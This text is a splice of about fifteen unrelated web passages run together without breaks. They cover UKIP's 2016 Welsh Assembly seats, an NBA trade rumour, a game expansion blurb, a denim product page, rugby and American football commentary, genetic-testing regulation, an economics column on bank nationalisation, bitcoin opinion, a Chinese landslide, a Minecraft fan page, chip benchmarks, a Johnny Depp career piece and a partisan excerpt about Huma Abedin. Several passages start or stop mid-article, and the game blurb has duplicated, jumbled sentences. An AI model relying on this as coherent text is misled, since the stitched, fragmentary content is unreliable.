So , like , the producers of The Walking Dead are on the phone right now with Michael Rooker 's reps cutting a deal to get him to write some episodes , right ? Because that 's the OBVIOUS response to this work of art .
Hayley Kirton
Ukip is making its mark in the 2016 elections , gaining 20 seats in the English council elections so far and winning its first seats in the Welsh Assembly .
5 UKIP Assembly Members elected in Wales so far , congratulations @ carolineUKIP . — Nigel Farage ( @ Nigel_Farage ) May 6 , 2016
Who 's had most net seat gains in the English Council elections so far ? Why , that 'd be @ UKIP I believe ( UKIP+20 Con+5 LD +8 Lab -24 G -1 ) — Jonathan Arnott MEP ( @ JonathanArnott ) May 6 , 2016
Nathan Gill and Michelle Brown have both won regional seats in North Wales and Mark Reckless and David Rowlands have both won seats in South East Wales .
Caroline Jones has won a seat in South Wales West and Neil Hamilton has won a seat in Mid and West Wales .
I thank all those who have made this day happen . I am truly honoured to have been elected by the people of Wales . pic.twitter.com/WoLLNH1yHE — Neil Hamilton AC/AM ( @ NeilUKIP ) May 6 , 2016
The last Ukip seat to be announced in Wales went to Gareth Bennett in South Wales Central , bringing the total to seven .
`` We want to be a breath of fresh air in the assembly – it 's been too cosy for too long , '' Reckless told BBC Wales .
However , the party failed to cover ground in Scotland .
Victor Oladipo ( Photo : NBAE via Getty Images )
The Los Angeles Lakers are pushing for an 11th hour trade that would give them Orlando Magic guard Victor Oladipo , and they are reportedly willing to trade one of their three highly-coveted youngsters to make the deal happen .
In an article on Morning News USA , the Lakers front-office is working on a trade package to acquire Oladipo from the Magic . According to the report , the Lakers are making reserve shooting guard Louis Williams available with the possibility of adding second-year guard Jordan Clarkson .
Advertisement
Via Morning News USA :
`` According to one source close to the Lakers , the team could be willing to give up Clarkson to acquire Oladipo since they both play at the same position . While Oladipo is capable of playing at the 3 , Magic coach Scott Skiles has preferred to use the former No . 2 draft pick in the backcourt . ''
Oladipo , the no.2 overall pick in the 2013 Draft , is averaging 14.3 points , 4.0 assists and 4.6 rebounds in 31 minutes per game in his first season under head coach Scott Skiles . The former Indiana Hoosier and Tobias Harris , who was already traded to the Detroit Pistons on Tuesday , have been made available by the Magic days ahead of Feb. 18 trade deadline ( Link Real GM ) .
On Wednesday , Lakers general manager Mitch Kupchak confirmed that they are receiving a awful lot of trade offers for their youngster trio of Clarkson , Julius Randle and D'Angelo Russell , although he stressed that it 's unlikely he 'll deal one of these players ( via Mike Bresnahan of Los Angeles Times ) .
On the other hand , the Lakers are also high on Oladipo because of the player 's massive two-way potential . Clarkson , who is averaging 15.4 points and 3.9 rebounds per contest , will become a restricted free-agent at the end of the season , while Oladipo is under contract through 2018 .
Lou Williams is playing on the first year of three-year , $ 21 million contract . He is averaging 15.4 points on 40 percent shooting from the field . Several teams have already expressed interest for the reigning Sixth Man of the Year .
About This Content
UNLEASH THE GUARDIANS
GIOS
NEROS
FOTIOS
ATMOS
SKOROS
COMPETE FOR SUPREMACY
10 Legendary Deeds : These extraordinary achievements are disseminated throughout the Eras . Each of them can only be completed by a single player and will give a significant boost by unlocking one of the new technologies , items , or city improvements created for the expansion .
: These extraordinary achievements are disseminated throughout the Eras . Each of them can only be completed by a single player and will give a significant boost by unlocking one of the new technologies , items , or city improvements created for the expansion . 10 Global Events : Be the one faction that makes the most of unexpected events affecting the entire planet .
: Be the one faction that makes the most of unexpected events affecting the entire planet . Cooperative & Competitive Quests : Both cooperative and competitive quests have been added in which players will either need to work together or compete to obtain a reward or suffer the hard consequences .
BUILD A MIGHTY EMPIRE
5 Legendary Buildings : Massive undertakings , these awe-inspiring buildings can only be constructed by one player per Era . Unlockable by achieving Legendary Deeds , these buildings are so powerful they are visible on the map .
: Massive undertakings , these awe-inspiring buildings can only be constructed by one player per Era . Unlockable by achieving Legendary Deeds , these buildings are so powerful they are visible on the map . 10 Unique Buildings : Additional unique buildings that will provide benefits and allow players to specialize their cities depending on their surroundings .
There are older and greater things in the universe than the Endless , whose few hundred centuries barely scrape the surface of history . What of those older entities , those other forces ? Did they disappear before the arrival of the Endless , or could the Endless , at the height of their power , have contained and controlled them ? And now that the Endless have faded or moved on , might some of these elder beings suddenly rise up again… ? These ancient giants , extensions of Auriga herself , have broken free from the chains with which the Endless imprisoned them . Make their legendary might yours , and impose your supremacy on other Empires ! Find and equip Gemstones ( new item category ) to strengthen your Guardians even further with buffs and new skills.The Earth Guardian , senses all that moves in or across the planet . When engaged in battle , the ancient giant inflicts impressive zone damage to enemy units by causing earthquakes . If the need arises , he is also able to repair cities ' fortifications.The Water Guardian , listens to the echoes of the present and the past . While roaming your enemies ' land he can destroy watchtowers and extractors . In battle , Neros can use his Tsunami charge to deal damage relative to his distance from the target.The Fire Guardian , is linked to the primeval force of fire . He is able to cast a powerful light that drastically extends vision range . In combat , Fotios uses his flames to inflict fire damage over time on his enemies.The Air Guardian , tracks the winds and scents of Auriga . Despite his size , the giant can teleport inside vision range , covering large distances in the blink of an eye . Atmos is also a fearful opponent as he gets stronger with each and every kill.The Dust Guardian , is attuned to Auriga 's magical currents . He has the ability to fully heal an entire allied army , and can use mind control spells to manipulate enemy units during battle.are another way to compete with other Empires . These competitive challenges reward the best with different types of compensations : Bonuses , technologies , resources , and items . Additionally , are now unfolding on Auriga . They will challenge all Empires with competitive and cooperative quests . The best will be rewarded with resources , items and special units ! Compete with the other Empires to build up to five . Gain powerful City Improvements that boost resources outputs , Approval or Influence.also allow further customization of Empires by unlocking specialized city improvements which are designed to support progression toward specific victory conditions .
Natural Indigo Cheese Dye
When a pair of The Natural Indigo Cheese Dye came through the office recently we knew we had to try to find more of this special fabric . As you can see , the combination of incredibly ancient dye techniques results in a magnificent pair of denim .
Gustin jeans made from sanforized raw selvedge denim from one of the finest mills in Japan . When we first received this style from the mill , we were struck by the color - an incredibly vibrant , bright , true indigo blue . We asked the mill to tell us more about this style and we were blown away . The goal was to explore the most ancient denim dyeing techniques to create a truly vintage style , different than anything else out there . It starts with the dye process itself . Before the now common rope dyeing technique for yarn , was the cheese dye process . It 's prized for extra deep dye penetration into the yarn . The result is more consistent color and a wear-in that 's much softer and more subtle than most denim . You can see how the color gets richer as the fabric is worn and washed . Even the dye itself is vintage . It 's one of the few styles that uses natural indigo plant dye , a very expensive ingredient and process , but the only way to honor the goal of respecting ancient process . The end result is not only a beautifully colored fabric that will age differently than anything you own , but also the special feeling of wearing something that respects the roots of the indigo denim craft .
Choose either our classic straight , slim or skinny fit . More details available on our fit guide .
Shaun Wane : Says Taulima Tautai will be Wigan 's only new signing for 2015
Wakefield Wildcats forward Taulima Tautai will be Wigan 's only recruit for 2015 , coach Shaun Wane has confirmed .
The champions are losing centre Darrell Goulding to Hull and Australian stand-off Blake Green is returning to Australia to take up a contract with Melbourne Storm but Wane is happy to plug the gaps from within .
Wane has given four home-grown products their Super League debuts this season and two other youngsters , George Williams and Sam Powell , have played most of the season , deputising for injured duo Green and Michael McIlorum .
We 're really young , we just need to be patient with our team . It 's exciting . We 're in fantastic shape as a club . Shaun Wane
`` I 'm happy with Tautai and I 'm happy that Dom Crosby is going to be another 12 months on and all the other players are going to be a bit more mature , '' Wane said .
Fantastic shape
`` We 're really young , we just need to be patient with our team . It 's exciting . We 're in fantastic shape as a club .
`` I 'm a big believer of building for the future . We 're the most successful team since 2010 when me and Madge ( Michael Maguire ) joined and we 've still got a really , really young team which is going to be good for years to come .
`` I get so many negative remarks sent to me about playing so many kids but people need to understand where we 're at .
`` We 're in good shape . If we win three games we 're top of the league and we 've probably had the worst injury run out of every Super League team . ”
Eddie Lacy went from a too fat , too hyped running back out of Alabama to the 2013 NFL Rookie of the year ( which I predicted right after he was drafted ) . However , Lacy 's meteoric rise to the best football player from the 2013 NFL draft was probably not as the Packers predicted ; with the injury to Aaron Rodgers collarbone the Packers morphed into a conservative , ball control offense lead by pounding Lacy behind Josh Sitton , TJ Land and Evan Dietrich-Smith . Naturally as Lacy proved to be the most effective weapon the Packers had left , he got more carries , which lead to more yards , more touchdowns and naturally more accolades . But with the return of Rodgers with a fully healed collarbone , what can the Packers expect from Lacy ?
First off the disappointing news ; successful rookie running backs do n't do as well on their second season . According to statistics pulled from Rotoworld , of running backs who gained at least 600 yards during their rookie season in the last 10 years :
66 % of running backs saw a decrease in their rushing production in year 2 72 % of running backs who rushed for at least 7 or more touchdowns saw a decrease in their scoring in year 2 75 % of running backs who rushed for at least 1,000 yards saw a decrease in their production in year 2
As the article states , there is really no concrete reason why running backs tend to decline going into their 2nd years ; one possibility is that teams have a full year 's worth of film to watch and thus are able to properly analyze what types of plays , holes or cuts a running back typically executes and can plan accordingly . Another possibility is that while running backs are n't typically over utilized their rookie year , high drafted runners like Lacy already come into the league with a lot of treads off their tires ; it 's quite well known that running backs have one of the shortest shelf lives of any position in the NFL and it 's possible that a rookie running back is already at his peak by the time he enters the NFL . There 's also the increase responsibility of being “ veteran ” player ; rookie running backs ( as well as all rookies for that matter ) are often given more simple assignments and only asked to do things they are already comfortable doing . With another offseason , 2nd year running backs are expected to fully know the offense , which for a running back includes protecting the quarterback , running a more diverse route tree , etc . With more things to think about and being put in more foreign situations likely results in a dip in production as well .
There are somethings that Lacy does have going for him that might help him keep his previous production or even increase it :
Lacy was out injured essentially 3 games ; if you project his 2013 season as a full 16 games you come up with 350 carries , 1449 yards and 13 touchdowns Lacy is likely to see less stacked boxes with Aaron Rodgers back in the fold . According to ProFootballFocus , Lacy trended downwards in terms of grading from week 12 onwards likely due to the fact teams knew the offense was focused on Lacy More importantly with a healthy Aaron Rodgers , Lacy is likely going to be running out the clock with the lead ; which is typically where running backs gain their statistics , especially a running back like Lacy who does best with a high volume of carries .
Overall , I think that Lacy will have lower numbers than his rookie year , but that necessarily is n't a bad thing . In reality Lacy is not the focal point of the Packers offense , Aaron Rodgers and the passing game is . Mike McCarthy is famous for his “ quantity not quality ” approach to the running game where he see 's running the football a necessary evil to producing a strong passing attack . While the addition of a runner of Lacy 's caliber might sway his opinions somewhat , there 's no denying that McCarthy and Rodgers are disciples of passing the ball and I do n't think that would change even if Adrian Peterson was on the roster . Finally Lacy 's running style is less about yardage and more about yards per carry ; if Lacy can maintain a healthy 3.5 YPC , keep the offense in good down and distance , make the play action fake something that teams actually have to think about and get the occasional tough 3rd and short I think the Packers would be happy even with a lot less production . Hell , it might even extend his career .
——————
Thomas Hobbes is a staff writer for Jersey Al 's AllGreenBayPackers.com .
——————
A couple of weeks ago , we saw the sorry saga of the Food and Drug Administration stomping on the effort by the direct-to-consumer ( DTC ) genotype screening company , Pathway Genomics , to offer its tests through drugstores . Pathway had reached an agreement with Walgreens to sell its test kits over-the-counter in its 6,000 or so stores . The FDA sent a threatening letter asking Pathway to justify the unregulated sale of a `` medical device '' to the public , and Walgreens backed away from its deal with the company .
Now the Congressional nanny-in-chief and head of the House Energy and Commerce Committee , Rep. Henry Waxman ( D-Calif. ) is demanding information by June 4 from three DTC companies , Pathway Genomics , Navigenics , and 23andMe . As Bloomberg reports :
The lawmakers gave the companies until June 4 to submit documents on the ability of the tests to identify consumers ' risks for illnesses . The legislators also requested information on the proficiency of the companies ' lab testing , policies on consumer privacy and whether the kits comply with FDA rules .
Some purchasers of the screening tests may be dissatisfied with their experiences , but I would suggest that most are first-adopter types who recognize the current limitations of genetic screening science . The way that consumers learn about the upsides and downsides of new products is to try them out ; just as the way companies learn how to improve their products is through customer feedback . As often occurs , the `` I'm-from-the-government-and-I'm-here-to-help '' types are eager to interfere with this kind of speedy social learning .
If you 've been thinking about buying a gene screening test , you might want to go ahead now before Congress and the FDA make it illegal for you to get this kind of information . Just saying .
Disclosure : I am a happy customer of 23andMe ( though I really wish their test had screened for the APOE4 allele associated with a much higher risk of Alzheimer 's disease ) . Given this news , I am going to order a new test from another company today . I own no stocks in any gene screening companies . Finally , my article on the joys of DTC gene screening and the exaggerated concerns over genetic privacy has at last been submitted to my editors at Reason who are now busy making improvements to it .
Financial protectionism
Andrew Rose , Tomasz Wieladek
During the global crisis governments made substantial interventions in financial markets , particularly in the banking sector . This column argues that one unintended consequence of bank nationalisations has been to reduce cross-border lending . After nationalisation , foreign banks reduced British lending as a share of total lending by about 11 percentage points and increased interest rates to UK residents by 70 basis points . This suggests foreign nationalised banks have engaged in financial protectionism .
The “ Great Recession ” which engulfed the world in 2008-09 is frequently compared to the Great Depression of the early 1930s . Many economists blame trade protectionism for deepening , spreading , and/or lengthening the Great Depression , especially given the dramatic decline in trade during the Great Recession ( Eichengreen and O'Rourke 2010 ) .
This time around , there is only muted evidence of traditional trade protectionism , at least thus far ( Global Trade Alert 2010 ) . But the public sector has made substantial interventions in financial markets around the world , particularly in the banking sector ( Figure 1 , Chart 1 ) , while cross-border bank lending has fallen globally ( Figure1 , Chart 2 ) . In a recent working paper ( Rose and Wieladek 2011 ) , we show that the two phenomena may well be linked ; international lending may have fallen because of public interventions in the financial sector .
More specifically , we ask : “ Have bank nationalisations reduced foreign lending disproportionately ? ” The answer is “ yes ” , and we interpret this as evidence of financial protectionism .
Figure 1 . Public capital injection and real bank external asset claims
Chart 1- Public capital injection , % 2008 GDP
Source : IMF
Chart 2 - Real BIS bank external asset claims
Source : BIS
We define financial protectionism as a nationalistic change in banks ' lending behaviour , as the result of public intervention , which leads domestic banks either to lend less or at higher interest rates to foreigners ( or both ) . Our objective is to test for financial protectionism empirically ( there is no theory of relevance ) . The aggregate British data series lends prima facie plausibility to the idea that lenders cut back more dramatically on their cross-border activity than on their domestic activity . Figure 2 plots the growth of lending to British business over the past few years . The superficial impression we get is that during the Great Recession , foreign lenders ( in this case banks with headquarters outside the UK ) contracted their activity more dramatically than British lenders ( banks with headquarters in the UK ) . But such aggregate evidence provides at most indirect support for the presence of financial protectionism . Only if foreign public institutions contracted their British loans more than foreign private institutions , would we have strong prima facie evidence of financial protectionism .
Figure 2 . Contributions to growth in lending to UK businesses
Note : Monetary financial institutions ' lending to private non-financial corporations . Three-month annualised growth rates in the stock of lending .
Unfortunately publicly available datasets typically do not provide sufficient information to rigorously test for financial protectionism1 . In this study , we take advantage of a panel data set on external and domestic lending collected by the Bank of England2 . This data set covers all banks operating in the UK , both British and foreign and is a reliable data set much used by the Bank of England . The dataset spans 1997Q3 through 2010Q1 , a period characterised by the most significant international financial crisis in decades , during which a number of British and foreign banks were nationalised or supported with capital injections and/or loan guarantees3 . Of course , many British and foreign banks did not need to rely on explicit state support for their survival . As such , this heterogeneity means that our dataset is ideally suited to testing for financial protectionism . We compare the loans of both British and foreign banks before and after nationalisations in a comprehensive dataset that includes banks that were either public , private , or switched status from one to the other .
We use a standard panel data model with period- and bank-specific fixed effects to search for financial protectionism , taking into account period- and bank-specific shocks and characteristics . Our main focus is the fraction of domestic ( British ) loans a bank makes as a fraction of its total loan activity , a ratio we refer to as the “ loan mix ” and we also investigate interest rates . Our key finding is that after nationalisation , foreign banks reduced British lending as a share of total lending by about 11 percentage points , and increased interest rates on new loans to UK residents by 70 basis points . By way of comparison , nationalisation does not seem to affect either the lending or interest rate decisions of British banks . These results are robust to a variety of perturbations to the underlying empirical model . Succinctly , foreign nationalised banks seem to have engaged in financial protectionism , while British nationalised banks have not .
Understanding the causes and impact of financial protectionism is an interesting item for the research agenda , especially if our result is general .
References
Eichengreen , Barry and Kevin H O'Rourke ( 2010 ) , “ A tale of two depressions : What do the new data tell us ” , VoxEU.org , 8 March .
Evenett , Simon ( ed . ) ( 2010 ) , Tensions Contained ... For Now : The 8th GTA Report , globaltradealert.org
Rose , Andrew and Tomasz Wieladek ( 2011 ) , “ Financial Protectionism : the First Tests ” , NBER Working Paper 17073 .
The Bank of International Settlements provides data on aggregate external lending among banking systems , but there is not breakdown between the lending decisions of nationalised and private institutions . Similarly , publicly available data at the institution level does typically not provide information on external lending .
2 We would like to thank Mark Robson for permitting us to use the data in this study . For assistance with the data , we thank Kiman Bassi , Eleanor Broughton , Mhairi Burnett , Martin Cleaves , Norbert Janssen , David Osborn , Jeremy Rowe , Jake Staines , and Martin Udy .
3 Indeed , the first substantial public sector intervention during the crisis was undertaken in the UK with the nationalisation of Northern Rock in September 2007 , the 5th largest mortgage lender at the time .
Many banks are questioning the impact that digital currencies will have on their business , however , as some banking executives are starting to realise that cryptocurrencies could provide a way for banks to highlight the security of banking systems in comparison to cryptocurrency technologies . Once you understand the nature of money then you can understand that as long as you can trust in its ability to stand the test of time ( durability ) and can keep immutable records of how much value you have consumed vs produced then it can act as money . Money is just a form of information . Information is most efficiently stored in digital form .
Let 's see the example-Similar why facebook is the most popular social network web site .
To benefit most from first application of Bitcoin – bitcoin currency , you need a network of people spending it and accepting it . The network effect must not be underestimated . Actually usefulness of bitcoin currency is growing with the square of participants inside it ( Metcalfe 's effect ) . For this same reason most money flows into cryptocurrency which gives it even infrastructure advantage ( new applications , etc… . ) .
The low liquidity of Bitcoin also plays a part in how it has been welcomed onto the trading field , as liquidity often determines how many partners are willing to trade with it . believes that the low liquidity of cryptocurrencies means they are often seen as a high risk investment because of these , Many governments and financial institutions seem to be having a ‘ wait and see ' approach towards cryptocurrencies . Some experts believe that digital currencies will disappear as quickly as they arrived , whereas others believe they will become a normal way of paying .
You may Intrest-How Bitcoin works ?
As more digital currencies are introduced into the cryptocurrency market , there is greater opportunity for competitors to develop a cryptocurrency that overtakes Bitcoin . The cryptocurrency of the future might be the future of money if it can provide greater liquidity and stability than Bitcoin .
something that will definitely be realized in the next 10 years is Bitcoin 2.0 applications , higher level uses of the underlying blockchain technology that will permeate into many more applications that just currency . The Internet of Things may very well be supported by a blockchain infrastructure . Apart from this bitcoin protocol solved a “ hard problem ” , it is an ingenious piece of technology ; and it was released alongside the namesake cryptocurrency that implements it and It is the first of its generation , has the most hashing power , people like the idea of Satoshi Nakamoto as the anonymous , mysterious figure behind it . It all show that Bitcoin and other cryptocurrencies has a potential power of future currency .
See also Should I invest in Bitcoin now ? Why ?
Story highlights Some 118 people -- mostly tourists -- were unaccounted for , vice mayor says
Flooding triggered the landslide , which has affected 1.5 million people
Torrents have washed away property worth more than $ 40 million
Tens of thousands of acres of crops have been inundated
Rescuers in China have pulled out a total of 43 bodies following a landslide the size of a small town that rushed down a mountain earlier in the week , state media reported Saturday .
Some 118 people across Dujiangyan City -- mostly tourists -- were unaccounted for as of 9:30 p.m. Saturday , Chen Yangjie , vice mayor of the city said at a news conference , according to the state-run Xinhua news agency .
The flooding that caused the landslide in the village of Sanxi , in Dujiangyan City , has destroyed 5,100 houses and damaged another 90,000 , officials said . Rescuers continued digging through the debris in search of survivors and victims .
`` So far no sign of life has been detected at the scene , '' Ma Kun , head of the firefighting division in Chengdu , capital of Sichuan Province , said , according to Xinhua .
Flooding that triggered the landslide has affected 1.5 million people and inundated tens of thousands of acres of crops . The torrents have plagued the mountainous region since Monday , smashing bridges and knocking out power to thousands .
JUST WATCHED Rain causes havoc , China braces for more Replay More Videos ... MUST WATCH Rain causes havoc , China braces for more 01:40
JUST WATCHED a dramatic flood rescue in China Replay More Videos ... MUST WATCH Watch a dramatic flood rescue in China 00:56
They have washed away property worth more than $ 40 million , provincial officials said .
Zhang Jiuchun is an interior designer living in Mianyang , the second-largest city in Sichuan . He told CNN in a phone interview that flooding , landslides and mudslides have paralyzed highway and rail services in many parts of the province .
Zhang said suburban areas have been hit the hardest .
`` I think it 's the worst since 1998 , '' Zhang said of the disaster , referring to major flooding that swept across China more than a decade ago .
Xinhua previously reported that more than 400 stranded people were safely moved out of Dujiangyan .
Welcome to the minecraft activity centre . Here you will find things to do to keep you busy during the summer . Take a look at what we have to offer .
Got any buildings you want to share ? Send me pictures at youssoffahmy @ gmail.com and a description to go with each one . And to inspire your own building , we will be keeping you busy with some new challenges and building projects every week , and the best ones will be featured on our pages .
And to go with that , we have a private summer server up at 178.32.241.17 so bring some friends and join us for some nice , friendly survival experience . More on that coming soon .
Right now , I 'm working on my summer home , where I can enjoy my vacation creeper free . I also automated almost everything , so I can take a break from my regular tasks like farming and mining , and just enjoy a nice holiday with my friends .
So stay tuned and visit often for the latest in minecraft entertainment . Remember to email anything you would like to feature on youssoffahmy @ gmail.com . And be sure to drop by our server sometime . Until then , see you next time , and have a nice summer .
keep the server alive by donating here .
Qualcomm 's Snapdragon 820 is one of the best chip that we are waiting for . Just to remind , it features Quad-core 2.2 GHz processor based on 14nm FinFET technology , and it will be combined with Adreno 530 GPU .
At the very start , when Snapdragon 820 was found on Geekbench 3 , the benchmark score was not much impressive . It scored 1732 in single-core performance and 4970 in multi-core . It seems that was the first time when Snapdragon 820 hit Geekbench 3 .
Later , Snapdragon 820 V2 version scored 1800 in single-core benchmark , that is little better that the first score . However , Multi-core performance score went down . May be Qualcomm messed up something that time .
Now , Snapdragon 820 V3 version on Geekbench 3 has done very well compared to its first and second version . This time , it scored 5910 in multi-core and 2032 in single-core performance . This score leaves Samsung 's Exynos 7420 behind in both multi-core and single-core benchmark.Qualcomm is still testing the chip to face the competition , and it could be even better when they finally launch it . I hope this is what Qualcomm 's fans were waiting for .
Have a look at Snapdragon 820 V2 and V3 benchmark score
Well , Apple A9 is still the best in terms of single-core performance , there is no match of it . But yes , Snapdragon 820 did much better in multi-core performance leaving all the Chipsets behind including Apple A9 .
Along with Snapdragon 820 , there are more Chipsets to arrive , like Mediatek helio X20 , Exynos 8890 ( or Mongoose M1 ) and Kirin 950 . Exynos 8890 was also spotted on Geekbench 3 with Samsung Lucky LTE ( Galaxy S7 ) model , but did n't do better than Snapdragon 820 . However , Kirin 950 would probably be a great match for Snapdragon 820 . Have a look at Kirin 950 benchmark .
Kirin 950 Geekbench benchmark multi-core performance score is 6096 compared to 5910 for Snapdragon 820 , but it left behind in Single-core . It 's going to be Chipsets war in 2016 , let 's see which one wins .
Also get to know ; Remote Desktop Connection Manager for Android/iOS/Windows/Mac/Linux
Chip Kelly got his first win , 14-9 against Carolina Friday , and answered a lot of the questions surrounding his radical makeover of the Eagles . Anxiety among fans and sportswriters turned into swelling excitement as the offense moved into high gear , showing a stout front line against the Panther 's powerful rush and demonstrating some of the deceptively simple flex-plays that Chip will run in the NFL .
The news on defense was even better , as the fresh-poured cement in this team 's foundation started to harden . The Eagles shut down the Panther run game and repeatedly pressured Cam Newton ( who ran for only 5 yards ) while the secondary looked at least competent , a major improvement from last year . A nasty pass rush can cover up a lot of soft coverage , and with this team , they 'll need it to .
from video
Overall , the Panthers were 4 for 14 on third down and did n't score up a TD in 2 red zone visits . If the defense had forced some turnovers — none yet in two games , though Brandon Boykin dropped one he should have had — and the offense did n't give up two of them in scoring position , the Eagles would have won by a lot more than five points .
Three days later , the coach confirmed what everyone had already seen on the field : that Michael Vick was the Eagles ' starting quarterback . Nick Foles has been very impressive through training camp , completing 78 % of passes and moving Kelly 's no-huddle offense efficiently , but Vick is even better — 86 % completion rate , good reads of the defense , and smart choices on QB runs . The surprise is that Vick 's biggest advantage over Foles — besides leadership — has been taking care of the ball better . After two terrible years with more TOs than TDs , Vick only gave up one INT , on a Hail Mary pass at the end of the first half . Foles had three turnovers , though he consistently was able to break off runs
Mark Saltveit
Kelly 's QB competition , which baffled so many reporters , worked perfectly . The Eagles now have two quarterbacks not only playing at a high level , but already adapted to the Eagles ' new offense . Vick has adapted better than anyone imagined to this new system ; a guy who completed 60 % of his preseason passes only once in ten years is pushing 90 % under Chip , and he 's protecting the ball very well . Foles , in only his second year , knows he can run the fast-paced offense despite his lack of running speed . He also knows that Vick has played all 16 games only once in his career , and is 32 ; he is the heir apparent by 2015 at the latest , and possibly as soon as the first time Vick refuses to slide at the end of a keeper .
There is a lot of work left to do . The defense in particular seems to fade as you move back from the line of scrimmage : the line looks strong , with third round pick Bennie Logan especially impressive at multiple positions , possibly even challenging Isaac Sopoaga for the starting nose tackle job . Linebackers are more hit or miss , especially on the outside , and the secondary looks about as solid as Lindsay Lohan 's sobriety . It might work , but … .
Christopher Macsurak
This is a team in a massive overhaul racing to pull it all together by September 9th . The leaps forward they took against Carolina are very encouraging in all three phases of the game — special teams even more than offense and defense , though kicker Alex Henery has looked suddenly erratic both in games and practice , which is odd for the guy who has made 87.9 % of his 58 NFL FG attempts , and holds the NFL Rookie record for accuracy .
In a couple of cases , we simply do n't know if there is an issue of bad attitude , or players are just coasting through the preseason . In Cary ( “ Sconce Boy ” ) Williams ' first game under Chip , he played off his receivers and gave up a number of completions . And while everyone from sportswriters to Chip has been raving DeSean “ Superball ” Jackson 's new attitude and dedication to weight-lifting , I saw some disturbing signs in the Carolina tape .
Far from looking for downfield blocks when his number was n't called , Jackson did n't even run out his routes at full speed consistently . When he trots through his paces , this lets linebackers shift to the middle and safeties pull in . Jackson is such a deep threat that he can really stretch a defense vertically , often pulling both a cornerback and a safety away from the play , but only if he runs out his patterns with full intensity . On another play , a screen on 2nd-and-14 , Jason Avant would have picked up the first down had Jackson held his block on Josh Thomas , who broke free and undercut Avant after ten yards .
from video
Similarly , on a first and ten with 9:40 remaining in the first , Riley Cooper finished his route and then casually trotted toward the run , where Chris Polk had burst through the first level and was pressing for a first down . I do n't know if Cooper could have reached CB Drayton Florence in time to block his initial contact , but it was certainly worth a try , and Polk might well have cut back around his approaching teammate to make it work . Cooper definitely could have prevented Panther safety Godfrey Charles ( # 30 ) from slamming Polk right at the end of the play , if he had n't been just standing there , watching and actually backing away from the scrum .
from video
These are things that can be fixed — with effective coaching and desire to change by the players . I 'm confident the Eagles will have the first of these . If they get both , this will be a very dangerous team .
* * *
In my book , The Tao of Chip Kelly , I quoted Charles Fischer on how Darron Thomas demonstrated the power of Chip Kelly 's offense . ( That interview led to me writing this column for FishDuck , as it turns out . ) FishDuck 's point was that Thomas led the Ducks to the national championship game in his first season starting , and a Rose Bowl victory his second , despite not having enough talent to make an NFL roster after he went pro early . ( He joined the Calgary Stampeders of the Canadian Football League last year — but only on the practice squad . )
Well , DT has finally made the roster of a pro football team : the Lincoln Haymakers of the Champions Professional Indoor Football League . ( It 's never a good sign when you have to put the word Professional in your league 's name , just to make sure that everyone is clear about that . )
Thomas hopes to help the Haymakers compete against league powerhouses including the Sioux City Bandits , the Salina Bombers and the Omaha Beef . ( Quick — what state is Salina in ? I was n't sure either . ) He should n't get too comfortable though . The team 's press release makes it clear that “ Thomas will compete in camp this winter to earn the starting job , ” in true Chip Kelly fashion .
Mark Saltveit 's best-selling book “ The Tao of Chip Kelly ” has received rave reviews from coaches , players and sportswriters since its release in June . You can find it at the Oregon Ducks Stores in Portland , Eugene and Bend , the Multnomah Athletic Club M-Porium in Portland , various bookstores in Pennsylvania and New Hampshire , and online at http : //www.chipkelly.tv/
It seems that Depp is stuck in an endless cycle of trying to recapture the delight that came with his entrance in that first Pirates of the Caribbean , cashing gigantic studio paychecks to keep whatever financial demons he has at bay , and looking for the next big hit to propel him back into the hearts of the viewing public . Despite negative reviews ( including one from The Atlantic 's own Christopher Orr ) , Pirates ' success is basically assured due to the franchise 's huge popularity overseas—the last entry , 2011 's On Stranger Tides , was similarly derided but made $ 1 billion worldwide ( more than 75 percent of it internationally ) .
As a result there will , at least for the next few years , still be the opportunity for Depp to cash in as much as he wants . But with each tentpole movie , he gets further and further away from the idiosyncratic charm that helped him make him stand out in the first place . Beyond that , he seems to have entirely lost his grasp on what made him such a magnetic screen presence in the first place . In the original Pirates , he found an angle ( 18th-century pirate-as-rock star ) that felt fresh , funny , and inventive . In the fifth , released Friday , he seems completely disconnected from the performance , hitting his marks and saying his lines ( and wearing his iconic costume ) with all the energy of someone waiting to clock out for the day .
After the unexpected success of Pirates ( it was a word-of-mouth sensation that opened big and dominated the entire moviegoing summer in 2003 ) , Depp continued to mix smaller indie work into his repertoire even as his stardom grew . He was helped by the fact that he 'd been a part of the Hollywood churn for some 15 years , getting his big break on the TV show 21 Jump Street and collaborating with directors like John Waters ( Cry-Baby ) , Jim Jarmusch ( Dead Man ) , and , of course , Tim Burton ( with whom he has made eight films ) . Before Pirates , he had only seen one film make more than $ 100 million—Sleepy Hollow in 1999 .
As a marquee idol , Depp saw even his smaller projects ( the thriller Secret Window , the dark musical Sweeney Todd ) become hits , racked up three Oscar nominations , and made two family-friendly films with Burton ( Charlie and the Chocolate Factory and Alice and Wonderland ) that were worldwide smashes . Though his first return to the Pirates franchise ( Dead Man 's Chest in 2006 ) got mixed reviews , it still earned a fortune , while Depp 's performance as J.M . Barrie in Finding Neverland received critical acclaim . Films like Public Enemies ( 2009 ) , a collaboration with the director Michael Mann in which Depp played the notorious John Dillinger , felt like the perfect way to translate his superstardom into something interesting .
Depp broke up with his longtime partner Vanessa Paradis in 2012 , and then embarked on a relationship with Heard , his co-star in 2011 's The Rum Diary ; they would marry in 2015 and break up a little more than a year later after a reportedly tempestuous romance . Depp contested Heard 's allegations of verbal and physical abuse during their divorce , but shocking pictures showing Heard 's injuries from an alleged domestic incident were then published in People Magazine . Depp nonetheless pressed on , publicly denying all of Heard 's accusations and signing on for several major film franchises , perhaps in an effort to dig himself out of his widely reported financial hole .
Author Paul Sperry dives into the Journal of Muslim Minority Affairs , where Huma Abedin worked as an editor for ten years .
From the New York Post :
Hillary Clinton 's top campaign aide , and the woman who might be the future White House chief of staff to the first female US president , for a decade edited a radical Muslim publication that opposed women 's rights and blamed the US for 9/11 .
One of Clinton 's biggest accomplishments listed on her campaign Web site is her support for the UN women 's conference in Bejing in 1995 , when she famously declared , “ Women 's rights are human rights. ” Her speech has emerged as a focal point of her campaign , featured prominently in last month 's Morgan Freeman-narrated convention video introducing her as the Democratic nominee .
However , soon after that “ historic and transformational ” 1995 event , as Clinton recently described it , her top aide Huma Abedin published articles in a Saudi journal taking Clinton 's feminist platform apart , piece by piece . At the time , Abedin was assistant editor of the Journal of Muslim Minority Affairs working under her mother , who remains editor-in-chief . She was also working in the White House as an intern for then-First Lady Clinton .
